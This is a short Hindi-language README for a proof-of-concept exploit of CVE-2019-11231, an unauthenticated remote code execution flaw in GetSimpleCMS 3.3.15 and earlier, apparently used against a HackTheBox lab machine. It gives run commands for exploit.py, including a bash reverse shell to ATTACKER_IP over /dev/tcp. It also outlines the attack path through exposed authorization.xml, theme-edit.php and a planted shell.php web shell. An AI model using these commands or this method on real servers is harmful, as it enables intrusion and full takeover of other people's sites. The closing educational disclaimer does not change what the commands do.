
CVE-2019-11231 PoC
GetSimpleCMS ≤ 3.3.15 के लिए अप्रमाणित दूरस्थ कोड निष्पादन शोषण
GetSimpleCMS संवेदनशील फ़ाइलों को सार्वजनिक रूप से उजागर करता है (/data/other/authorization.xml, /data/users/) जिससे हमलावर:
CVSS स्कोर: 9.8 (गंभीर)
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
/admin//data/other/authorization.xml/data/users//admin/theme-edit.php/admin/theme-edit.php/theme/shell.php?cmd=...exploit.py - मुख्य शोषण स्क्रिप्टrequirements.txt - निर्भरताएँ (requests, beautifulsoup4)⚠️ केवल शैक्षिक उद्देश्य। केवल उन सिस्टम पर परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण की अनुमति है।